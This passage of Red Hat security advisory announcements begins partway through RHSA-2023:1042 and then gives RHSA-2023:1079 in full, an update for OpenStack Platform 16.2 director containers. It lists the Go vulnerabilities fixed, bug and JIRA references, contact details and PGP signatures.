2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters  
2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps  
2134010 - CVE-2022-32149 golang: golang.org/x/text/language: ParseAcceptLanguage takes a long time to parse complex tags

5. JIRA issues fixed (https://issues.jboss.org/):

OCPNODE-1260 - Wrong links to CMA repository in CMA operator in OperatorHub

6. References:

https://access.redhat.com/security/cve/CVE-2022-1705  
https://access.redhat.com/security/cve/CVE-2022-1962  
https://access.redhat.com/security/cve/CVE-2022-2879  
https://access.redhat.com/security/cve/CVE-2022-2880  
https://access.redhat.com/security/cve/CVE-2022-27664  
https://access.redhat.com/security/cve/CVE-2022-28131  
https://access.redhat.com/security/cve/CVE-2022-28327  
https://access.redhat.com/security/cve/CVE-2022-30630  
https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/cve/CVE-2022-30632  
https://access.redhat.com/security/cve/CVE-2022-30633  
https://access.redhat.com/security/cve/CVE-2022-30635  
https://access.redhat.com/security/cve/CVE-2022-32148  
https://access.redhat.com/security/cve/CVE-2022-32149  
https://access.redhat.com/security/cve/CVE-2022-41715  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAaFRtzjgjWX9erEAQj/4hAAldx0//Hb5yYz4eiZy9WZCnnao56WgBbQ  
DBxiep9b9bhaoOUDDw8g7ClxafMHpp7u7BmQksA9+bnqcBEqNg8OV5mNqglzoPKa  
qJkHKI837qX1NUBNwmmj/32cjT0czC0N+QiTM0LoPyWQmiw1pJWriHMfLyFIfcgw  
QUDemm7XzYiRYxf+ViHaufndsOGYVplmysdO2C9qGi+Lckzl1fr5GeJgPD4QL/4h  
ebpgV2XQb5drYIiBt224HruJNmj2j4iP32hxf3IYOJbihk+EB2ZzkINmDq27a5mf  
qrJSJn9Q9ZiMyVP7NqK04HoW/Ntj9ZU0atzHnVVd470TFubgRKOAGsnS68fIC5XP  
ZbCPWoGC+mZzzsZrgK+3vMX90Y5rmBXWPHLLooSWCha4TpEhg0rlzmw4dzW+Uumz  
M48n+SfIde5b6aCsPAmnNeLNy0UQ9iDcv4Yzmc4qdEfWigRgULaoIHOqJGW0UVZg  
ffqcu4S7tihJij5L4j20vbTGWZgn5KAmTY7Dxt/S1yN0Re5uBzMXu0gri5TtKJgM  
CEfULzNSXgjE1C8hrPPKKR6La+cyIbAXCocPTlTepwE+mqVtHqAHkvKooOCr45um  
BRwrMWahWGgOpZ/COrPu0ccgaz1GRtmArK/pjbXswM8ep2wa6oMaQgf4IA7/1UUF  
7NvSWcK9Wr0=F/ST  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1042-01

Red Hat Security Advisory 2023-1079-01 - An update for osp-director-downloader-container, osp-director-agent-container and osp-director-operator-container is now available for Red Hat OpenStack Platform 16.2 (Train).

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Red Hat OpenStack Platform 16.2 (osp-director-downloader-container, osp-director-agent-container and osp-director-operator-container) security update  
Advisory ID:       RHSA-2023:1079-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1079  
Issue date:        2023-03-06  
CVE Names:         CVE-2021-46848 CVE-2022-2879 CVE-2022-4415  
                   CVE-2022-35737 CVE-2022-40303 CVE-2022-40304  
                   CVE-2022-41715 CVE-2022-41717 CVE-2022-47629  
====================================================================  
1. Summary:

An update for osp-director-downloader-container,  
osp-director-agent-container and osp-director-operator-container is now  
available for Red Hat OpenStack Platform 16.2 (Train).

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Security Fix(es):

* archive/tar: unbounded memory consumption when reading headers  
(CVE-2022-2879)

* regexp/syntax: limit memory used by parsing regexps (CVE-2022-41715)

* net/http: An attacker can cause excessive memory growth in a Go server  
accepting HTTP/2 requests (CVE-2022-41717)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers  
2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps  
2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests

5. JIRA issues fixed (https://issues.jboss.org/):

OSPK8-664 - Unexpected "unassigned" hostRefs in OSBMS halt further reconcile loops

6. References:

https://access.redhat.com/security/cve/CVE-2021-46848  
https://access.redhat.com/security/cve/CVE-2022-2879  
https://access.redhat.com/security/cve/CVE-2022-4415  
https://access.redhat.com/security/cve/CVE-2022-35737  
https://access.redhat.com/security/cve/CVE-2022-40303  
https://access.redhat.com/security/cve/CVE-2022-40304  
https://access.redhat.com/security/cve/CVE-2022-41715  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2022-47629  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAYw69zjgjWX9erEAQhpKw/+IoljDi48GfOED0GN7xDhf0dClmlzuPnM  
ozrwsuBpcFWlY62saZacWkG4UBfLTubkMEdkuWlNrP0TNxSFOzWRDBZpsp6KHzsg  
5t8doz9jHTsPP60q/PEOni6Jw8Z5zCN9qVRprNPObEAZdoHaPZpQI6dJkZMSd6Pf  
q40hJkI0nu+GEknlJtUbJqaCf7sED6/Tn2uGrFYuL+uKEcw7Dh8Up0c3QFYjHxCH  
H4kTOyiBCsbQNztdDhR+/hBEezSFSw/WgXynvzS2SyP4gQ/AhV5af53KJ0nJieC7  
KnH9RKVR2h5PkRRGiH3yBG/Vl4Y13P4fh3rwjUWZGCp4LhjzS0pqjsyYzBnFJODT  
GjX+nEi5z15OMuxO6YrignuDfMMisz2OUY1XZa2M9CQUDBkQyikwSOdMfDk2LVS+  
dznlfqNejn7CDA4mUwkpQ1NsQXi9MEVI9UhN5sf/SASoIj1uGG20fot1w1gQyEka  
kFpwz2FyvXA8xGruJbRmV6QuWLxZmXeosjRWQZhJL9KcuuAdQgVSfqFQYHrEGOxa  
oJbqdOv1GAauwPPhH49eoShzi3jwRyzuEQIsxwz73nY+TSOHmTdnynn+nSSREXb0  
qNkHwGMi9RsC+HmXj/qzmwge5BjChwLQxLsAj+6FOCwFvtyU9jbr/y4hq8CAmGFa  
eAniE3J/0sc=r2R4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#js